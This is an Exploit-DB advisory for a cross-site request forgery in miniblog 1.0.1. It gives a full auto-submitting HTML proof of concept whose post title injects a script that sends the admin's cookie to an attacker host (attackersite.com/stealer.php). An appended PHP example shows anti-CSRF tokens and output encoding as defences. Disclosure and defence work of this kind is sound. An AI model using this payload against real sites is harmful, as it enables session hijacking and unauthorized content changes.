- 18 Dec 2022
- EDB-ID
- 40480
- EDB Verified
- Passed
- Author
- BESIM
- Vulnerability type
- WEBAPPS
- Platform
- PHP
- CVE
- N/A
- Publication date
- 2016-10-09
miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
Code:
# Exploit Title : miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
# Author : Besim
# Google Dork :
# Date : 09/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.spyka.net/scripts/php/miniblog
# Software link : http://dl.spyka.co.uk/scripts/php/miniblog-1-0-1.zip
Description (admin login required) :
miniblog version 1.0.1 is vulnerable to CSRF attacks that add, delete and
edit articles in the sections.
Vulnerable page : http://localhost:8081/miniblog/adm/admin.php?mode=add
Dangerous point : if combined with XSS, it can be used to steal the admin's cookie information.
############### CSRF PoC ###############
<html>
<!-- CSRF PoC -->
<body>
<form action="http://localhost:8081/miniblog/adm/admin.php?mode=add&id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20post%20in%20%3Cb%3EC:\xampp\htdocs\miniblog\adm\edit.php%3C/b%3E%20on%20line%20%3Cb%3E8%3C/b%3E%3Cbr%20/%3E" method="POST">
<input type="hidden" name="data[post_title]" value="<script>location.href = 'http://www.attackersite.com/stealer.php?cookie='+document.cookie;</script>" />
<input type="hidden" name="data[post_content]" value="tester" />
<input type="hidden" name="data[published]" value="1" />
<input type="hidden" name="miniblog_PostBack" value="Add" />
<input type="submit" value="Submit request" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
########################################
- Source
- www.exploit-db.com
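The two defences this report calls for, a per-session anti-CSRF token on the admin form and output encoding of the stored post title, shown as an added example that is not miniblog's code and not part of the original advisory. The function names and the `csrf_token` field are hypothetical; the other field names are the ones the PoC form submits.

```php
<?php
// Added example, not miniblog's code. Function names and the csrf_token field
// are hypothetical; the other field names are the ones the PoC form submits.

// Issue one random token per admin session and embed it in every admin form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing request only if it is a POST that echoes the
// session's token. A form hosted on another site cannot read that token.
function csrf_check(array $session, string $method, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return $method === 'POST'
        && is_string($supplied)
        && $expected !== ''
        && hash_equals($expected, $supplied);   // constant-time comparison
}

// Encode stored post fields on output so a title that contains markup is
// shown as text instead of being interpreted by the browser.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed demo: $session stands in for $_SESSION and $forged for the
// $_POST body an auto-submitting cross-site form delivers (no token field).
$session = [];
$token   = csrf_token($session);
$forged  = ['data' => ['post_title' => '<b>t</b>', 'post_content' => 'tester',
            'published' => '1'], 'miniblog_PostBack' => 'Add'];
$genuine = $forged + ['csrf_token' => $token];

// The forged body lacks the token; the genuine body carries it.
var_dump(csrf_check($session, 'POST', $forged));
var_dump(csrf_check($session, 'POST', $genuine));
echo e($forged['data']['post_title']), "\n";
```

In a real handler the check would run before any branch that acts on `miniblog_PostBack`. Marking the session cookie HttpOnly additionally keeps it out of `document.cookie`.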